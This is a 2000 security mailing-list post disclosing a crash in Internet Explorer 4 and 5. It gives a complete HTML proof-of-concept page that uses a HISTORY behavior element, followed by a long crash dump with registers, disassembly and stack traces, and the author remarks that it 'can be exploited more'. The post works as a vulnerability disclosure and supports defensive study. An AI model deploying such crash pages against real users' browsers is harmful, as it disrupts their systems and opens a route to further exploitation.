--[Tuesday, March 21, 2000 by NtWaK0 /
biteraser]------------------------------

--[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY*
Object]---

--[Tested on  Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too
?]-------

Here is the story, while having a chat (IRC) with biteraser today heh, he
suddenly said *fu*k* hrm... I said what is wrong

He said I JUST CRASHED IE..
After some investigation it turned about to be the *HISTORY* Object :).

So if you cut and past the html code in a file, then open it with IE, you
will
be able to see the crash.

Note: key line is: <HS:HISTORY ID="HS">, without it IEt won't crash and
behavior
      should be #default. It can be exploited more.


--[SNIP]--------------------------------------------------------------------
---
 <HTML>
<HEAD>
<Title>Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx</Title>
</HEAD>
<BODY>
<xml:namespace ns='CallFixPage' prefix='HS'>
<STYLE>
        @media all{HS\:HISTORY {behavior:url(#default);}}
</STYLE>
<!--XML code -->
<HS:HISTORY ID="HS" />
<!-- End XML code -->

</BODY>
</HTML>
--[SNIP]--------------------------------------------------------------------
---



NOTE: Crash Memory dump.



Application exception occurred:
        App: exe\iexplore.dbg (pid=219)
        When: 3/21/2000 @ 12:52:24.60
        Exception number: c0000005 (access violation)

*----> System Information <----*
        Computer Name: INFOSEC-BRAIN
        User Name: Administrator
        Number of Processors: 1
        Processor Type: x86 Family 6 Model 6 Stepping 10
        Windows Version: 4.0
        Current Build: 1381
        Service Pack: 6
        Current Type: Uniprocessor Free
        Registered Organization: NtWaK0
        Registered Owner: NtWaK0

(00400000 - 00412000) exe\iexplore.dbg
(77f60000 - 77fbe000) dll\ntdll.dbg
(77f00000 - 77f5e000) dll\kernel32.dbg
(77e70000 - 77ec5000) dll\user32.dbg
(77ed0000 - 77efc000) dll\gdi32.dbg
(77dc0000 - 77dff000) dll\advapi32.dbg
(77e10000 - 77e67000) dll\rpcrt4.dbg
(70bd0000 - 70c19000) SHLWAPI.dbg
(71500000 - 71610000) SHDOCVW.dbg
(00760000 - 007e9000) COMCTL32.dbg
(77c40000 - 77d7b000) dll\shell32.dbg
(71740000 - 71740000)
(22000000 - 22000000)
(77b20000 - 77bd7000) dll\ole32.dbg
(71050000 - 71118000) BROWSEUI.dbg
(717b0000 - 717b0000)
(779b0000 - 779b9000) dll\linkinfo.dbg
(77720000 - 77731000) dll\mpr.dbg
(77a40000 - 77a4d000) dll\ntshrui.dbg
(78000000 - 78040000)
(77800000 - 7783a000) dll\netapi32.dbg
(77840000 - 77849000) dll\NetRap.dbg
(777e0000 - 777ed000) dll\samlib.dbg
(65340000 - 653d2000) oleaut32.dbg
(70290000 - 702fe000) URLMON.dbg
(77a90000 - 77a9b000) dll\version.dbg
(779c0000 - 779c8000) dll\lz32.dbg
(77bf0000 - 77bf7000) dll\rpcltc1.dbg
(70410000 - 70492000) MLANG.dbg
(70000000 - 70242000) MSHTML.dbg
(01700000 - 01772000) WININET.dbg
(48080000 - 48080000)
(76ab0000 - 76ab5000) dll\imm32.dbg
(70f00000 - 70f1a000) dll\iepeers.dbg

State Dump for Thread Id 0xd2

eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000
edi=80004005
eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000202


function: Ordinal158
        70bd180d 8b542408         mov     edx,[esp+0x8]
ss:0129808f=????????
        70bd1811 56               push    esi
        70bd1812 8b742408         mov     esi,[esp+0x8]
ss:0129808f=????????
FAULT ->70bd1816 0fb706           movzx   eax,word ptr [esi]
ds:00000000=????
        70bd1819 46               inc     esi
        70bd181a 46               inc     esi
        70bd181b 83f841           cmp     eax,0x41
        70bd181e 7c05             jl      Ordinal158+0x18 (70bd1825)
        70bd1820 83f85a           cmp     eax,0x5a
        70bd1823 7e1d             jle     Ordinal158+0x35 (70bd1842)
        70bd1825 0fb70a           movzx   ecx,word ptr [edx]
ds:70f01ef4=0043
        70bd1828 42               inc     edx
        70bd1829 42               inc     edx
        70bd182a 83f941           cmp     ecx,0x41
        70bd182d 7c05             jl      Ordinal158+0x27 (70bd1834)

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158
000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog
000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog
00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog
00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog
00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog
00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog
0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60
MSHTML!DllGetClassObject
0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8
MSHTML!MatchExactGetIDsOfNames
00000000 00000000 00000000 00000000 00000000 00000000
MSHTML!MatchExactGetIDsOfNames

*----> Raw Stack Dump <----*
00069688  0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70
...pWm.p.......p
00069698  68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00
h.......@.......
000696a8  78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00
x..p..}.........
000696b8  38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00
8Y,.@.....}.....
000696c8  00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01
...........p..}.
000696d8  00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00
....4Z,.8Y,.@...
000696e8  40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00
@....Y,..@......
000696f8  8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01
...p....4Z,.8Y,.
00069708  40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00
@...0Y,.0Y,.`...
00069718  44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01
D......p....8Y,.
00069728  40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00
@...0Y,..Y,.....
00069738  10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00  .4,..
.p....`...
00069748  5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00
0  ]~.p.....Y,.|...
00069758  7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00
|.........\.C.r.
00069768  61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00
a.s.h._.A.L.L._.
00069778  49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00
I.E.4._.I.E.5._.
00069788  6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00
o.n._.W.i.n.d.o.
00069798  77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00
w.s._.9.x._.a.n.
000697a8  64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00
d._.A.l.l._.N.T.
000697b8  5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00
_.S.P.x._.w.i.t.

State Dump for Thread Id 0xc6

eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30
edi=000872e8
eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0         nv up ei pl nz na po
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000206


function: ZwReplyWaitReceivePort
        77f67f9c b890000000       mov     eax,0x90
        77f67fa1 8d542404         lea     edx,[esp+0x4]
ss:01a7e7f7=????????
        77f67fa5 cd2e             int     2e
        77f67fa7 c21000           ret     0x10
        77f67faa 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff
ntdll!ZwReplyWaitReceivePort
00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate

State Dump for Thread Id 0xee

eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c
edi=0008a2ec
eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0         nv up ei pl nz na pe
nc
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000202


function: NtDelayExecution
        77f67914 b827000000       mov     eax,0x27
        77f67919 8d542404         lea     edx,[esp+0x4]
ss:0249e96f=????????
        77f6791d cd2e             int     2e
        77f6791f c20800           ret     0x8
        77f67922 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution
0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep
00000000 00000000 00000000 00000000 00000000 00000000 iexplore!<nosymbols>

*----> Raw Stack Dump <----*
0126ff68  f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00
...w....|.&.....
0126ff78  00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01
......<.......&.
0126ff88  be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77
...w`..........w
0126ff98  60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77
`......w.......w
0126ffa8  e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02
...........w....
0126ffb8  40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02
@....N.w........
0126ffc8  40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01
@.......@.....&.
0126ffd8  00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77
........D..w8..w
0126ffe8  00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77
............m..w
0126fff8  e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00
................
01270008  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270018  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270028  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270038  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270048  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270058  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270068  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270078  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270088  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
01270098  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................

State Dump for Thread Id 0xec

eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4
edi=016fff78
eip=77f682db esp=016fff5c ebp=016fff80 iopl=0         ov up ei pl nz na po
cy
cs=001b  ss=0023  ds=0023  es=0023  fs=0038  gs=0000
efl=00000a07


function: NtWaitForSingleObject
        77f682d0 b8c5000000       mov     eax,0xc5
        77f682d5 8d542404         lea     edx,[esp+0x4]
ss:0292e963=????????
        77f682d9 cd2e             int     2e
        77f682db c20c00           ret     0xc
        77f682de 8bc0             mov     eax,eax

*----> Stack Back Trace <----*

FramePtr ReturnAd Param#1  Param#2  Param#3  Param#4  Function Name
016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc
ntdll!NtWaitForSingleObject
77f67610 4affc033 89257508 ff900c42 037d044a 520004c2
kernel32!WaitForSingleObject

*----> Raw Stack Dump <----*
016fff5c  a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01
...w........x.o.
016fff6c  00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a
.....$,.@u.w.D_.
016fff7c  fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00
.....v.w7O.w....
016fff8c  c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00
.'.........p....
016fff9c  c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01
.'...,.w.$,...o.
016fffac  10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70
.$,....pP..w...p
016fffbc  de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77
.N.w.$,..,.wP..w
016fffcc  10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00
.$,.P..w..o.T...
016fffdc  ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00
....D..w8..w....
016fffec  00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01
...........p.$,.
016ffffc  00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00
....MZ..........
0170000c  ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00
............@...
0170001c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170002c  00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00
................
0170003c  c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c
............!..L
0170004c  cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63  .!This program
c
0170005c  61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20  annot be run in
0170006c  44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00  DOS
mode....$...
0170007c  00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4
....c...'...'...
0170008c  27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4
'...'.......~...

--[END]---------------------------------------------------------------------
---

Cheers,
|-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-|
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-|
Live Well Do Good --:)

Cheers,
------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------
The only secure computer is one that's unplugged, locked in a
safe, and buried 20 feet under the ground in a secret location...
and i'm not even too sure about that one"--Dennis Huges, FBI.
-----------------------------------------------------------------
Live Well Do Good --:)